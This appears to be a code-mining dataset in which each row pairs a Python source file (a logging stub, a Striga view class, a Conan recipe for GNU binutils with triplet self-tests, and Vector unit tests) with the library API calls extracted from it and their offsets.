code | apis | extract_api
---|---|---
from oslo_log import log as logging

LOG = logging.getLogger(__name__)


def main():
    pass
|
[
"oslo_log.log.getLogger"
] |
[((44, 71), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (61, 71), True, 'from oslo_log import log as logging\n')]
|
import os, logging as L

import striga.core.exception
import striga.server.application

from ._stsvcsb_utils import PathLimiter, LoabableObject

###

class View(PathLimiter, LoabableObject):
    '''
    Process bus object that executes Striga views
    '''

    def __init__(self, rootdir, source, mode, entry = 'main', pathlimit = '==0'):
        app = striga.server.application.GetInstance()
        loadable = app.Services.Loader.LoadStrigaFile(os.path.abspath(os.path.join(rootdir, source)), buildmode = mode, doload = False)
        PathLimiter.__init__(self, pathlimit)
        LoabableObject.__init__(self, loadable)
        self.Entry = entry
        self.EntryPoint = None

    def __call__(self, ctx, path, *args, **kwargs):
        self.CheckPath(path)
        if self.EntryPoint is None:
            #TODO: Here is a correct place for lazy loading (when self.LoabableObject.IsLoaded is False and self.LoabableObject.GetError is None)
            #      - launch worker that will call self.LoabableObject.Load() (retry option below must be implemented)
            #TODO: Implement error reporting (Striga file is not loaded - can contain error)
            #TODO: Handle the possibility that the loader is still running (error in self.LoabableObject is None)
            #      - wait for some reasonable amount of time and retry
            if self.LoabableObject.IsLoaded():
                L.warning("Striga view file '%s' is loaded but doesn't provide the striga view interface" % (str(self.LoabableObject)))
                raise striga.core.exception.StrigaBusError('NotFound')
            L.warning("Striga view '%s' is not loaded (yet) - it is in status '%s'" % (str(self.LoabableObject), self.LoabableObject.GetStatusString()))
            raise striga.core.exception.StrigaBusError('NotLoaded')
        ctx.res.SetContentType('text/html')
        ctx.res.SetCacheAge(0)
        out = self.LoabableObject.OutClass(ctx.res.Write)
        self.EntryPoint(ctx, out, *args, **kwargs)

    def _OnLOLoaded(self, strigafile):
        self.EntryPoint = None
        module = self.LoabableObject.GetModule()
        if not hasattr(module, self.Entry):
            L.warning("Striga file '%s' does not contain entry point '%s'" % (str(self.LoabableObject), self.Entry))
            return
        EntryPoint = getattr(module, self.Entry)
        if not callable(EntryPoint):
            L.warning("Striga file '%s' entry point '%s' is not callable" % (str(self.LoabableObject), self.Entry))
            return
        if not hasattr(EntryPoint, 'StrigaViewEntry'):
            L.warning("Striga file '%s' entry point '%s' is not a Striga entry (use decorator @StrigaViewEntry)" % (str(self.LoabableObject), self.Entry))
            return
        self.EntryPoint = EntryPoint
        L.info("Striga view '%s' loaded" % str(strigafile))

    def _OnLOFailed(self, strigafile):
        self.EntryPoint = None
        L.info("Striga view '%s' unloaded" % str(strigafile))
|
[
"os.path.join"
] |
[((451, 480), 'os.path.join', 'os.path.join', (['rootdir', 'source'], {}), '(rootdir, source)\n', (463, 480), False, 'import os, logging as L\n')]
|
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from conans.errors import ConanInvalidConfiguration
import functools
import os
import re
import typing
import unittest
required_conan_version = ">=1.43.0"
# This recipe includes a selftest to test conversion of os/arch to triplets (and vice versa)
# Run it using `python -m unittest conanfile.py`
class BinutilsConan(ConanFile):
name = "binutils"
description = "The GNU Binutils are a collection of binary tools."
license = "GPL-2.0-or-later"
url = "https://github.com/conan-io/conan-center-index/"
homepage = "https://www.gnu.org/software/binutils"
topics = ("binutils", "ld", "linker", "as", "assembler", "objcopy", "objdump")
settings = "os", "arch", "compiler", "build_type"
_PLACEHOLDER_TEXT = "__PLACEHOLDER__"
options = {
"multilib": [True, False],
"with_libquadmath": [True, False],
"target_arch": "ANY",
"target_os": "ANY",
"target_triplet": "ANY",
"prefix": "ANY",
}
default_options = {
"multilib": True,
"with_libquadmath": True,
"target_arch": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"target_os": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"target_triplet": _PLACEHOLDER_TEXT, # Initialized in configure, checked in validate
"prefix": _PLACEHOLDER_TEXT, # Initialized in configure (NOT config_options, because it depends on target_{arch,os})
}
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
@property
def _settings_target(self):
return getattr(self, "settings_target", None) or self.settings
def export_sources(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
self.copy(patch["patch_file"])
def config_options(self):
del self.settings.compiler.cppstd
del self.settings.compiler.libcxx
def configure(self):
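# Resolve placeholder options: if no target_triplet was given, build it from
# target_arch/target_os (defaulting those to the target settings); otherwise
# deduce any unset target_arch/target_os from the given triplet.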
if self.options.target_triplet == self._PLACEHOLDER_TEXT:
if self.options.target_arch == self._PLACEHOLDER_TEXT:
# If target triplet and target arch are not set, initialize it from the target settings
self.options.target_arch = str(self._settings_target.arch)
if self.options.target_os == self._PLACEHOLDER_TEXT:
# If target triplet and target os are not set, initialize it from the target settings
self.options.target_os = str(self._settings_target.os)
# Initialize the target_triplet from the target arch and target os
self.options.target_triplet = _GNUTriplet.from_archos(_ArchOs(arch=str(self.options.target_arch), os=str(self.options.target_os), extra=dict(self._settings_target.values_list))).triplet
else:
gnu_triplet_obj = _GNUTriplet.from_text(str(self.options.target_triplet))
archos = _ArchOs.from_triplet(gnu_triplet_obj)
if self.options.target_arch == self._PLACEHOLDER_TEXT:
# If target arch is not set, deduce it from the target triplet
self.options.target_arch = archos.arch
if self.options.target_os == self._PLACEHOLDER_TEXT:
# If target os is not set, deduce it from the target triplet
self.options.target_os = archos.os
if self.options.prefix == self._PLACEHOLDER_TEXT:
self.options.prefix = f"{self.options.target_triplet}-"
self.output.info(f"binutils:target_arch={self.options.target_arch}")
self.output.info(f"binutils:target_os={self.options.target_os}")
self.output.info(f"binutils:target_triplet={self.options.target_triplet}")
def validate(self):
if self.settings.compiler in ("msvc", "Visual Studio"):
raise ConanInvalidConfiguration("This recipe does not support building binutils by this compiler")
if self.options.target_os == "Macos":
raise ConanInvalidConfiguration("cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)")
# Check whether the actual target_arch and target_os option are valid (they should be in settings.yml)
# FIXME: does there exist a stable Conan API to accomplish this?
if self.options.target_arch not in self.settings.arch.values_range:
raise ConanInvalidConfiguration(f"target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})")
if self.options.target_os not in self.settings.os.values_range:
raise ConanInvalidConfiguration(f"target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})")
target_archos = _ArchOs(str(self.options.target_arch), str(self.options.target_os))
target_gnu_triplet = _GNUTriplet.from_text(str(self.options.target_triplet))
if not target_archos.is_compatible(target_gnu_triplet):
suggested_gnu_triplet = _GNUTriplet.from_archos(target_archos)
suggested_archos = _ArchOs.from_triplet(target_gnu_triplet)
raise ConanInvalidConfiguration(f"target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}.")
# Check, when used as build requirement in a cross build, whether the target arch/os agree
settings_target = getattr(self, "settings_target", None)
if settings_target is not None:
if self.options.target_arch != settings_target.arch:
raise ConanInvalidConfiguration(f"binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}")
if self.options.target_os != settings_target.os:
raise ConanInvalidConfiguration(f"binutils:target_os={self.options.target_os} does not match target os={settings_target.os}")
def package_id(self):
del self.info.settings.compiler
def _raise_unsupported_configuration(self, key, value):
raise ConanInvalidConfiguration(f"This configuration is unsupported by this Conan recipe. Please consider adding support. ({key}={value})")
def build_requirements(self):
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
def requirements(self):
self.requires("zlib/1.2.12")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
strip_root=True, destination=self._source_subfolder)
@property
def _exec_prefix(self):
return os.path.join(self.package_folder, "bin", "exec_prefix")
@functools.lru_cache(1)
def _configure_autotools(self):
autotools = AutoToolsBuildEnvironment(self, win_bash=self._settings_build.os == "Windows")
yes_no = lambda tf : "yes" if tf else "no"
conf_args = [
f"--target={self.options.target_triplet}",
f"--enable-multilib={yes_no(self.options.multilib)}",
"--with-system-zlib",
"--disable-nls",
f"--program-prefix={self.options.prefix}",
f"exec_prefix={tools.unix_path(self._exec_prefix)}",
]
autotools.configure(args=conf_args, configure_dir=self._source_subfolder)
return autotools
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
autotools = self._configure_autotools()
autotools.make()
def package(self):
self.copy("COPYING*", src=self._source_subfolder, dst="licenses")
autotools = self._configure_autotools()
autotools.install()
tools.rmdir(os.path.join(self.package_folder, "share"))
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.la")
def package_info(self):
bindir = os.path.join(self.package_folder, "bin")
self.output.info("Appending PATH environment variable: {}".format(bindir))
self.env_info.PATH.append(bindir)
target_bindir = os.path.join(self._exec_prefix, str(self.options.target_triplet), "bin")
self.output.info("Appending PATH environment variable: {}".format(target_bindir))
self.env_info.PATH.append(target_bindir)
self.output.info(f"GNU triplet={self.options.target_triplet}")
self.user_info.gnu_triplet = self.options.target_triplet
self.output.info(f"executable prefix={self.options.prefix}")
self.user_info.prefix = self.options.prefix
# Add recipe path to enable running the self test in the test package.
# Don't use this property in production code. It's unsupported.
self.user_info.recipe_path = os.path.realpath(__file__)
class _ArchOs:
def __init__(self, arch: str, os: str, extra: typing.Optional[typing.Dict[str, str]]=None):
self.arch = arch
self.os = os
self.extra = extra if extra is not None else {}
def is_compatible(self, triplet: "_GNUTriplet") -> bool:
return self.arch in self.calculate_archs(triplet) and self.os == self.calculate_os(triplet)
_MACHINE_TO_ARCH_LUT = {
"arm": "armv7",
"aarch64": ("armv8", "armv9"),
"i386": "x86",
"i486": "x86",
"i586": "x86",
"i686": "x86",
"x86_64": "x86_64",
"riscv32": "riscv32",
"riscv64": "riscv64",
}
@classmethod
def calculate_archs(cls, triplet: "_GNUTriplet") -> typing.Tuple[str]:
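# "arm" machines become armv7 or armv7hf depending on the ABI; all other machines
# go through the lookup table (one entry may expand to several arches, e.g. aarch64 -> armv8/armv9).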
if triplet.machine == "arm":
archs = "armv7" + ("hf" if "hf" in triplet.abi else "")
else:
archs = cls._MACHINE_TO_ARCH_LUT[triplet.machine]
if isinstance(archs, str):
archs = (archs, )
return archs
_GNU_OS_TO_OS_LUT = {
None: "baremetal",
"android": "Android",
"mingw32": "Windows",
"linux": "Linux",
"freebsd": "FreeBSD",
"darwin": "Macos",
"none": "baremetal",
"unknown": "baremetal",
}
@classmethod
def calculate_os(cls, triplet: "_GNUTriplet") -> str:
if triplet.abi and "android" in triplet.abi:
return "Android"
return cls._GNU_OS_TO_OS_LUT[triplet.os]
@classmethod
def from_triplet(cls, triplet: "_GNUTriplet") -> "_ArchOs":
archs = cls.calculate_archs(triplet)
os = cls.calculate_os(triplet)
extra = {}
if os == "Android" and triplet.abi:
m = re.match(".*([0-9]+)", triplet.abi)
if m:
extra["os.api_level"] = m.group(1)
# Assume first architecture
return cls(arch=archs[0], os=os, extra=extra)
def __eq__(self, other) -> bool:
if type(self) != type(other):
return False
if not (self.arch == other.arch and self.os == other.os):
return False
self_extra_keys = set(self.extra.keys())
other_extra_keys = set(other.extra.keys())
if (self_extra_keys - other_extra_keys) or (other_extra_keys - self_extra_keys):
return False
return True
def __repr__(self) -> str:
return f"<{type(self).__name__}:arch='{self.arch}',os='{self.os}',extra={self.extra}>"
class _GNUTriplet:
def __init__(self, machine: str, vendor: typing.Optional[str], os: typing.Optional[str], abi: typing.Optional[str]):
self.machine = machine
self.vendor = vendor
self.os = os
self.abi = abi
@property
def triplet(self) -> str:
return "-".join(p for p in (self.machine, self.vendor, self.os, self.abi) if p)
@classmethod
def from_archos(cls, archos: _ArchOs) -> "_GNUTriplet":
gnu_machine = cls.calculate_gnu_machine(archos)
gnu_vendor = cls.calculate_gnu_vendor(archos)
gnu_os = cls.calculate_gnu_os(archos)
gnu_abi = cls.calculate_gnu_abi(archos)
return cls(gnu_machine, gnu_vendor, gnu_os, gnu_abi)
@classmethod
def from_text(cls, text: str) -> "_GNUTriplet":
gnu_machine: str
gnu_vendor: typing.Optional[str]
gnu_os: typing.Optional[str]
gnu_abi: typing.Optional[str]
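# A triplet has 2-4 dash-separated parts: machine(-vendor)?(-os)?(-abi)?; the last
# part is treated as the ABI only if it matches one of the known ABI keywords.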
parts = text.split("-")
if not 2 <= len(parts) <= 4:
raise ValueError("Wrong number of GNU triplet components. Count must lie in range [2, 4]. format=$machine(-$vendor)?(-$os)?(-$abi)?")
gnu_machine = parts[0]
parts = parts[1:]
if any(v in parts[-1] for v in cls.KNOWN_GNU_ABIS):
gnu_abi = parts[-1]
parts = parts[:-1]
else:
gnu_abi = None
if len(parts) == 2:
gnu_vendor = parts[0]
gnu_os = parts[1]
elif len(parts) == 1:
if parts[0] in _GNUTriplet.UNKNOWN_OS_ALIASES:
gnu_vendor = None
gnu_os = parts[0]
elif parts[0] in cls.OS_TO_GNU_OS_LUT.values():
gnu_vendor = None
gnu_os = parts[0]
else:
gnu_vendor = parts[0]
gnu_os = None
else:
gnu_vendor = None
gnu_os = None
return cls(gnu_machine, gnu_vendor, gnu_os, gnu_abi)
ARCH_TO_GNU_MACHINE_LUT = {
"x86": "i686",
"x86_64": "x86_64",
"armv7": "arm",
"armv7hf": "arm",
"armv8": "aarch64",
"riscv32": "riscv32",
"riscv64": "riscv64",
}
@classmethod
def calculate_gnu_machine(cls, archos: _ArchOs) -> str:
return cls.ARCH_TO_GNU_MACHINE_LUT[archos.arch]
UNKNOWN_OS_ALIASES = (
"unknown",
"none",
)
OS_TO_GNU_OS_LUT = {
"baremetal": "none",
"Android": "linux",
"FreeBSD": "freebsd",
"Linux": "linux",
"Macos": "darwin",
"Windows": "mingw32",
}
@classmethod
def calculate_gnu_os(cls, archos: _ArchOs) -> typing.Optional[str]:
if archos.os in ("baremetal", ):
if archos.arch in ("x86", "x86_64", ):
return None
elif archos.arch in ("riscv32", "riscv64"):
return "unknown"
return cls.OS_TO_GNU_OS_LUT[archos.os]
OS_TO_GNU_VENDOR_LUT = {
"Windows": "w64",
"baremetal": None,
}
@classmethod
def calculate_gnu_vendor(cls, archos: _ArchOs) -> typing.Optional[str]:
if archos.os in ("baremetal", "Android"):
return None
if archos.os in ("Macos", "iOS", "tvOS", "watchOS"):
return "apple"
return cls.OS_TO_GNU_VENDOR_LUT.get(archos.os, "pc")
@classmethod
def calculate_gnu_abi(self, archos: _ArchOs) -> typing.Optional[str]:
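# Bare-metal targets use "eabi" (armv7) or "elf"; Linux/Android targets get a
# "gnu"/"android" prefix, an eabi/eabihf suffix for 32-bit ARM, and the Android API level when known.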
if archos.os in ("baremetal", ):
if archos.arch in ("armv7",):
return "eabi"
else:
return "elf"
abi_start = None
if archos.os in ("Linux", ):
abi_start = "gnu"
elif archos.os in ("Android", ):
abi_start = "android"
else:
return None
if archos.arch in ("armv7",):
abi_suffix = "eabi"
elif archos.arch in ("armv7hf",):
abi_suffix = "eabihf"
else:
abi_suffix = ""
if archos.os in ("Android", ):
abi_suffix += str(archos.extra.get("os.api_level", ""))
return abi_start + abi_suffix
KNOWN_GNU_ABIS = (
"android",
"gnu",
"eabi",
"elf",
)
def __eq__(self, other: object) -> bool:
if type(self) != type(other):
return False
other: "_GNUTriplet"
return self.machine == other.machine and self.vendor == other.vendor and self.os == other.os and self.abi == other.abi
def __repr__(self) -> str:
def x(v):
if v is None:
return None
return f"'{v}'"
return f"<{type(self).__name__}:machine={x(self.machine)},vendor={x(self.vendor)},os={x(self.os)},abi={x(self.abi)}>"
class _TestOsArch2GNUTriplet(unittest.TestCase):
def test_linux_x86(self):
archos = _ArchOs(arch="x86", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="i686", vendor="pc", os="linux", abi="gnu"), "i686-pc-linux-gnu")
self.assertEqual(_ArchOs("x86", "Linux"), _ArchOs.from_triplet(_GNUTriplet.from_text("i386-linux")))
self.assertEqual(_ArchOs("x86", "Linux"), _ArchOs.from_triplet(_GNUTriplet.from_text("i686-linux")))
self.assertEqual(_GNUTriplet("i486", None, "linux", None), _GNUTriplet.from_text("i486-linux"))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("i486-linux")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("i486-linux-gnu")))
def test_linux_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Linux"), _GNUTriplet(machine="x86_64", vendor="pc", os="linux", abi="gnu"), "x86_64-pc-linux-gnu")
def test_linux_armv7(self):
archos = _ArchOs(arch="armv7", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor="pc", os="linux", abi="gnueabi"), "arm-pc-linux-gnueabi")
self.assertEqual(_GNUTriplet("arm", "pc", None, "gnueabi"), _GNUTriplet.from_text("arm-pc-gnueabi"))
self.assertEqual(_GNUTriplet("arm", "pc", None, "eabi"), _GNUTriplet.from_text("arm-pc-eabi"))
self.assertEqual(_ArchOs("armv7hf", "baremetal"), _ArchOs.from_triplet(_GNUTriplet.from_text("arm-pc-gnueabihf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-linux-gnueabi")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-linux-eabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-linux-gnueabihf")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-gnueabihf")))
def test_linux_armv7hf(self):
archos = _ArchOs(arch="armv7hf", os="Linux")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor="pc", os="linux", abi="gnueabihf"), "arm-pc-linux-gnueabihf")
self.assertEqual(_GNUTriplet("arm", "pc", None, "gnueabihf"), _GNUTriplet.from_text("arm-pc-gnueabihf"))
self.assertEqual(_ArchOs("armv7", "baremetal"), _ArchOs.from_triplet(_GNUTriplet.from_text("arm-pc-gnueabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-linux-gnueabi")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-linux-eabi")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-pc-linux-gnueabihf")))
self.assertFalse(archos.is_compatible(_GNUTriplet.from_text("arm-pc-gnueabihf")))
def test_windows_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="Windows"), _GNUTriplet(machine="i686", vendor="w64", os="mingw32", abi=None), "i686-w64-mingw32")
def test_windows_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Windows"), _GNUTriplet(machine="x86_64", vendor="w64", os="mingw32", abi=None), "x86_64-w64-mingw32")
def test_macos_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Macos"), _GNUTriplet(machine="x86_64", vendor="apple", os="darwin", abi=None), "x86_64-apple-darwin")
def test_freebsd_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="FreeBSD"), _GNUTriplet(machine="x86_64", vendor="pc", os="freebsd", abi=None), "x86_64-pc-freebsd")
def test_baremetal_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="baremetal"), _GNUTriplet(machine="i686", vendor=None, os=None, abi="elf"), "i686-elf")
def test_baremetal_x86_64(self):
archos = _ArchOs(arch="x86_64", os="baremetal")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="x86_64", vendor=None, os=None, abi="elf"), "x86_64-elf")
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-elf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-none-elf")))
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("x86_64-unknown-elf")))
def test_baremetal_armv7(self):
archos = _ArchOs(arch="armv7", os="baremetal")
self._test_osarch_to_gnutriplet(archos, _GNUTriplet(machine="arm", vendor=None, os="none", abi="eabi"), "arm-none-eabi")
self.assertTrue(archos.is_compatible(_GNUTriplet.from_text("arm-none-eabi")))
def test_baremetal_armv8(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv8", os="baremetal"), _GNUTriplet(machine="aarch64", vendor=None, os="none", abi="elf"), "aarch64-none-elf")
def test_baremetal_riscv32(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="riscv32", os="baremetal"), _GNUTriplet(machine="riscv32", vendor=None, os="unknown", abi="elf"), "riscv32-unknown-elf")
def test_baremetal_riscv64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="riscv64", os="baremetal"), _GNUTriplet(machine="riscv64", vendor=None, os="unknown", abi="elf"), "riscv64-unknown-elf")
def test_android_armv7(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv7", os="Android", extra={"os.api_level": "31"}), _GNUTriplet(machine="arm", vendor=None, os="linux", abi="androideabi31"), "arm-linux-androideabi31")
def test_android_armv8(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="armv8", os="Android", extra={"os.api_level": "24"}), _GNUTriplet(machine="aarch64", vendor=None, os="linux", abi="android24"), "aarch64-linux-android24")
def test_android_x86(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86", os="Android", extra={"os.api_level": "16"}), _GNUTriplet(machine="i686", vendor=None, os="linux", abi="android16"), "i686-linux-android16")
def test_android_x86_64(self):
self._test_osarch_to_gnutriplet(_ArchOs(arch="x86_64", os="Android", extra={"os.api_level": "29"}), _GNUTriplet(machine="x86_64", vendor=None, os="linux", abi="android29"), "x86_64-linux-android29")
self.assertEqual(_ArchOs(arch="x86_64", os="Android", extra={"os.api_level": "25"}), _ArchOs.from_triplet(_GNUTriplet.from_text("x86_64-linux-android29")))
def _test_osarch_to_gnutriplet(self, archos: _ArchOs, gnuobj_ref: _GNUTriplet, triplet_ref: str):
gnuobj = _GNUTriplet.from_archos(archos)
self.assertEqual(gnuobj_ref, gnuobj)
self.assertEqual(triplet_ref, gnuobj.triplet)
self.assertEqual(gnuobj_ref, _GNUTriplet.from_text(triplet_ref))
# self.assertEqual(triplet_ref, tools.get_gnu_triplet(archos.os, archos.arch, compiler="gcc"))
|
[
"conans.tools.get",
"conans.tools.unix_path",
"os.path.realpath",
"re.match",
"conans.tools.patch",
"conans.AutoToolsBuildEnvironment",
"conans.errors.ConanInvalidConfiguration",
"conans.tools.get_env",
"functools.lru_cache",
"os.path.join"
] |
[((7022, 7044), 'functools.lru_cache', 'functools.lru_cache', (['(1)'], {}), '(1)\n', (7041, 7044), False, 'import functools\n'), ((6370, 6512), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""This configuration is unsupported by this conan recip. Please consider adding support. ({key}={value})"""'], {}), "(\n f'This configuration is unsupported by this conan recip. Please consider adding support. ({key}={value})'\n )\n", (6395, 6512), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6777, 6887), 'conans.tools.get', 'tools.get', ([], {'strip_root': '(True)', 'destination': 'self._source_subfolder'}), "(**self.conan_data['sources'][self.version], strip_root=True,\n destination=self._source_subfolder)\n", (6786, 6887), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((6960, 7015), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""', '"""exec_prefix"""'], {}), "(self.package_folder, 'bin', 'exec_prefix')\n", (6972, 7015), False, 'import os\n'), ((7101, 7179), 'conans.AutoToolsBuildEnvironment', 'AutoToolsBuildEnvironment', (['self'], {'win_bash': "(self._settings_build.os == 'Windows')"}), "(self, win_bash=self._settings_build.os == 'Windows')\n", (7126, 7179), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((8252, 8292), 'os.path.join', 'os.path.join', (['self.package_folder', '"""bin"""'], {}), "(self.package_folder, 'bin')\n", (8264, 8292), False, 'import os\n'), ((9103, 9129), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (9119, 9129), False, 'import os\n'), ((3979, 4076), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""This recipe does not support building binutils by this compiler"""'], {}), "(\n 'This recipe does not support building binutils by this compiler')\n", (4004, 4076), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4137, 4291), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['"""cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)"""'], {}), "(\n 'cci does not support building binutils for Macos since binutils is degraded there (no as/ld + armv8 does not build)'\n )\n", (4162, 4291), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4561, 4700), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})"""'], {}), "(\n f'target_arch={self.options.target_arch} is invalid (possibilities={self.settings.arch.values_range})'\n )\n", (4586, 4700), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((4781, 4914), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})"""'], {}), "(\n f'target_os={self.options.target_os} is invalid (possibilities={self.settings.os.values_range})'\n )\n", (4806, 4914), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((5312, 5606), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. 
Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}."""'], {}), "(\n f'target_arch={target_archos.arch}/target_os={target_archos.os} is not compatible with {target_gnu_triplet.triplet}. Change target triplet to {suggested_gnu_triplet.triplet}, or change target_arch/target_os to {suggested_archos.arch}/{suggested_archos.os}.'\n )\n", (5337, 5606), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((7787, 7807), 'conans.tools.patch', 'tools.patch', ([], {}), '(**patch)\n', (7798, 7807), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((8076, 8118), 'os.path.join', 'os.path.join', (['self.package_folder', '"""share"""'], {}), "(self.package_folder, 'share')\n", (8088, 8118), False, 'import os\n'), ((8156, 8196), 'os.path.join', 'os.path.join', (['self.package_folder', '"""lib"""'], {}), "(self.package_folder, 'lib')\n", (8168, 8196), False, 'import os\n'), ((10863, 10898), 're.match', 're.match', (['""".*([0-9]+)"""', 'triplet.abi'], {}), "('.*([0-9]+)', triplet.abi)\n", (10871, 10898), False, 'import re\n'), ((5889, 6034), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}"""'], {}), "(\n f'binutils:target_arch={self.options.target_arch} does not match target architecture={settings_target.arch}'\n )\n", (5914, 6034), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6108, 6237), 'conans.errors.ConanInvalidConfiguration', 'ConanInvalidConfiguration', (['f"""binutils:target_os={self.options.target_os} does not match target os={settings_target.os}"""'], {}), "(\n f'binutils:target_os={self.options.target_os} does not match target os={settings_target.os}'\n )\n", (6133, 6237), False, 'from conans.errors import ConanInvalidConfiguration\n'), ((6594, 6626), 'conans.tools.get_env', 'tools.get_env', (['"""CONAN_BASH_PATH"""'], {}), "('CONAN_BASH_PATH')\n", (6607, 6626), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n'), ((7519, 7553), 'conans.tools.unix_path', 'tools.unix_path', (['self._exec_prefix'], {}), '(self._exec_prefix)\n', (7534, 7553), False, 'from conans import ConanFile, AutoToolsBuildEnvironment, tools\n')]
|
import unittest

from homeworks.homework_1.task_1.vector import Vector


class VectorTest(unittest.TestCase):
    def test_empty_vector(self):
        with self.assertRaises(ValueError):
            self.assertEqual(Vector([]).length(), 0)

    def test_int_length(self):
        self.assertEqual(Vector([3, 4]).length(), 5)

    def test_float_length(self):
        self.assertAlmostEqual(Vector([0.1, 4, 3.5]).length(), 5.316013544)

    def test_different_dimensions_scalar_product(self):
        with self.assertRaises(ValueError):
            Vector([1, 2]).scalar_product(Vector([1, 3, 4]))

    def test_int_scalar_product(self):
        self.assertEqual(Vector([2, 3]).scalar_product(Vector([1, 4])), 14)

    def test_float_scalar_product(self):
        first_v = Vector([3.5, 1.74, 0.896, 0.445])
        second_v = Vector([1, -2.97, -1.065, -3.29])
        self.assertAlmostEqual(first_v.scalar_product(second_v), -4.08609)

    def test_self_scalar_product(self):
        self.assertAlmostEqual(Vector([1, -2.97, -1.065]).scalar_product(Vector([1, -2.97, -1.065])), 10.955125)

    def test_different_dimensions_angle(self):
        with self.assertRaises(ValueError):
            Vector([1, 2]).angle(Vector([1, 3, 4]))

    def test_float_angle(self):
        first_v = Vector([3.5, 1.74, 0.896, 0.445])
        second_v = Vector([1, -2.97, -1.065, -3.29])
        self.assertAlmostEqual(first_v.angle(second_v), 102.53349294109442)

    def test_self_angle(self):
        self.assertAlmostEqual(Vector([1, -2.97, -1.065]).angle(Vector([1, -2.97, -1.065])), 0.0)
|
[
"homeworks.homework_1.task_1.vector.Vector"
] |
